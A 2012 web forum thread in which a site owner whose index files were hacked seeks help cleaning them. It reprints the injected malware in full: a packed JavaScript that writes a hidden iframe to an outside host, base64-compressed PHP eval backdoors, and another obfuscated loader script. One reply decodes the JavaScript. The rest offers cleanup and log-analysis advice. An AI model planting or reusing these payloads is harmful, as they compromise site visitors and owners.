1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HELP ME PLEASE, been hacked, help please!

Discussion in 'HTML & JavaScript' started by littlewebdragon, Jan 5, 2012.

  1. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    Some of my websites have been hacked and I've got all index.php and index.html files infected...

    That shithead who is doing this keeps placing this code into html websites:

    Code:
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookiej|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393370783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f68676c7764727a2e64646e732e696e666f2f692f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>
    On the very start of BODY tag!

    And that same shithead places some PHP code that I've managed to decode...

    Has anyone else experienced the same? How did you get rid of this shit?

    ANY HELP will be appreciated and I might even decide to pay someone to solve this out for me...

    But please, help me out if you can...

    Also, can you decode above so that we can know what that shit is actually for?
     
    • Thanks Thanks x 1
  2. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    Are you running wordpress or do you have any third party scripts or plugins running?
     
  3. gregstereo

    gregstereo Elite Member

    Joined:
    Oct 5, 2009
    Messages:
    1,833
    Likes Received:
    1,027
    Occupation:
    I'm known to locate certain things from time to ti
    Location:
    Moose Factory, ON
    • Thanks Thanks x 1
  4. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
  5. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    I'm running WP, and I'm running some regular .html sites and some php combined with html sites... Nothing does not have a pattern...

    It ONLY changes a index.php file and index.html file and nothing else...

    This is what I found out so far, it's that this is the shit that's actually doing it:

    Code:
    http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html
    But I can't rid of it, ANY HELP would be appreciated...

    If anyone can decode script but fully decode it so we can see where does this eventually lead to (to what website)... It would be highly appreciated...

    ANY HELP would be highly appreciated!

    Thank you!
     
  6. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    This is what I've been able to find so far. I hope it helps:

    Update with a fresh wp-settings.php

    Look for this code:


    Code:
    <?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ=='))); eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/h***AXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?> 
    in these locations and delete it:


    public_html/index.php
    wp-admin/index.php
    wp-admin/network/index.php
    wp-admin/user/index.php
    wp-content/index.php
    wp-content/plugins/index.php
    3 files in si-captcha/captcha plugin
    wp-content/themes/index.php
    wp-content/themes/SPECIFIC THEME/index.php
    wp-content/wp-includes/theme-compat/footer.php


    You also need to check for backdoors and installing Exploit Scanner plugin wouldn't be a bad idea either. Hope this helps.

    Love,
    Mary
     
    • Thanks Thanks x 2
  7. xpwizard

    xpwizard Junior Member

    Joined:
    Nov 6, 2010
    Messages:
    198
    Likes Received:
    122
    Code:
    function hDcd(data) {
    var b16_digits = '0123456789abcdef';
    var b16_map = new Array();
    for (var i = 0; i < 256; i++) {
    	b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i)
    }
    if (!data.match(/^[a-f0-9]*$/i)) return false;
    if (data.length % 2) data = '0' + data;
    var ll = data.length;
    var result = new Array();
    var j = 0;
    for (var i = 0; i < ll; i += 2) {
    	result[j++] = b16_map[data.substr(i, 2)]
    }
    return result.join('')
    }
    if (document.cookie.indexOf('cookiej=enabled') == -1) {
    	document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393370783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f68676c7764727a2e64646e732e696e666f2f692f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'));
    	document.cookie = 'cookiej=enabled'
    }
    ^ That redirects to:

    Code:
    http://hglwdrz.ddns.info/i/i.php?go=1
     
    • Thanks Thanks x 3
  8. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,156
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
    Home Page:
  9. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    THANK YOU Mary and THANK YOU xpwizard!!!

    I really appreciate it... With your help Mary I've found out that this stuff may be everywhere and it is some sort of exploit...

    I'll see how to do exploit scan with exploit scanner plugin and see where it will pop up code like that...

    Also between changed files, there was si-contact form as you stated so it might be connected... I'm on it...

    @xpwizard

    Thank you for that... I jsut wanted to know what this shit is doing?

    It's just redirecting there, like stealing traffic?
     
  10. xpwizard

    xpwizard Junior Member

    Joined:
    Nov 6, 2010
    Messages:
    198
    Likes Received:
    122
    Not too sure (it's not doing anything to me)... But here's a more detailed report about that page:

    Code:
    http://urlquery.net/report.php?id=14613
     
  11. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    Yes, that is exactly the script that's mentioned everywhere...

    My final thought is that server has been hacked...

    I mean I change permissions to 444 and someone get's back and restores it to 644 or 755 or 666... That can't be done if you are not logged in to FTP...

    This is part from that report URL that you've sent me...
    This url myftp.org is often connected with other websites where I see iframe hack and index files hacked mentioned...

    THANK YOU for helping me out with this...
     
  12. mpulse

    mpulse Regular Member

    Joined:
    May 27, 2009
    Messages:
    292
    Likes Received:
    40
    sounds like what happened to me and like with 10 sites


    You will have to go through all the PHP and HTML index files...
    If it was on a CMS and it most likely was.
    Just find the same version and replace all the core files with the ones that are the same version number of whatever your working with..
    It took me 6hrs to unhack a site.
    First time, I pat my self on the back for that. ;)
    Its a bit tedious but its actually easy

    What you can also do is load up all of your site files in Sharpoint or deamweaver....
    Then do a global search on ALL FILES! Search for the code thats in the site. All php and all html.
    Mostlikley its just in your index.html or .php files only. But thats how i did it..


    Also make sure you look at any extentions/plugins/mambots etc for newer versions. You may have to delete the whole folder and replace with a clean and updated version.
    This was the code I found in mine I just searched for the code globally...

    HTML:
    window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5mph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0ygt3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0Acj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rph%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9iga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba"; var visitnum=window.history.length%1000-window.history.length+4; var countbox=document.createElement("div");countbox.id='countbox'; idarr = new Array(97,114,93,104); for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);} var cont=''; currentuser=true, nextuser=countbox.firstChild; do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild) var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){}
    Good luck and cheers!
     
    Last edited: Jan 8, 2012
  13. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    Quick update for everyone that maybe are having/facing this problem...

    FOR NOW what I realized that stops hacking to happen is 755 for folders and 444 for index files... YES 444 not 644... Apparently it works, and that's fine with me for now...

    I will find where it came from just it was impossible even so far, even with hosting provider help...

    Thank you all for participating and helping me out when I was really stressed... :)
     
  14. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    do you have access to the apache log files and looked at them?
    if the attack went through wp you will probably find an answer there.
     
  15. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Occupation:
    Occupation
    Location:
    Location
    I have access to them and I've looked at them, funny thing is that I was not unable to see what changed files...

    How can I see if some script has changed my files?

    Or if "person" did it? I think script changes it...

    Honestly I didn't know what to look... :(
     
  16. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    You should post on the wordpress forum. There are TONS of people there who love to help and know every little trick in the book.
     
  17. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    you probably won't see a request that directly changes your files, you should look for a injection of malicious code or the use of some existent script to download and execute it

    look for uncommon request paths
    -contains urls
    -contains file paths
    -contains lots of url encoded characters = lots of %XX where X = [0-9a-fA-F]
    look for ips scanning your server for exploits and generating lots of 404 responses, then look if they found something (not a 404 response)

    you can try some forensic log analyzers like apache-scalp, i think ossec has also a tool for this